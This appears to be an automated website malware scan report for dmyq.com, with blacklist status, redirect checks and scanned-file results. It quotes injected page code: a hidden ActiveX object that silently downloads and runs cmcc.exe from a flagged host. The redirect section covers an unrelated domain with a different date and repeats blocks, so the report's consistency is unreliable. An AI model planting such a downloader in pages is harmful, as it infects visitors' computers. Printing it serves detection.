Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dmyq.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pavonabridal.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 27 Jan 2015 00:30:32 GMT
Location: http://ww15.pavonabridal.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3-7+squeeze23
...0 bytes of data.
GET / HTTP/1.1
Host: pavonabridal.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 27 Jan 2015 00:30:32 GMT
Location: http://ww15.pavonabridal.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3-7+squeeze23
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pavonabridal.com
Referer: http://www.google.com/search?q=pavonabridal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pavonabridal.com
Referer: http://www.google.com/search?q=pavonabridal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://dmyq.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 03 Oct 2014 03:54:34 GMT Location: http://www.yqmama.cn Server: Apache/2.2.6 (Win32) PHP/5.2.5 Content-Length: 891 Content-Type: text/html X-Powered-By: PHP/5.2.5 | malicious |
http://www.yqmama.cn/ | 200 OK Content-Length: 104557 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 1.qhacklm.sinaapp.com ...[3479 bytes skipped]... discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script></body> </html><div style="position: absolute; top: -999px;left: -999px;"> <h3><div id="link25541lianjie8"> </html></script></body><BODY><OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="http://1.qhacklm.sinaapp.com/DownloaderActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://1.qhacklm.sinaapp.com/cmcc.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM ...[238 bytes skipped]... | ||
http://www.yqmama.cn/static/js/common.js?r2s | 200 OK Content-Length: 63268 Content-Type: application/javascript | clean |
http://dmyq.com/static/js/portal.js?r2s | 200 OK Content-Length: 11314 Content-Type: application/javascript | clean |
http://dmyq.com/template/comiis_19lou/img/comiis.js | 200 OK Content-Length: 84763 Content-Type: application/javascript | clean |
http://dmyq.com/template/comiis_19lou/img/comiis_jq.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://dmyq.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://tcss.qq.com/ping.js?v=1r2s | 200 OK Content-Length: 8909 Content-Type: application/x-javascript | clean |
http://dmyq.com/home.php?mod=misc&ac=sendmail&rand=1412308475 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |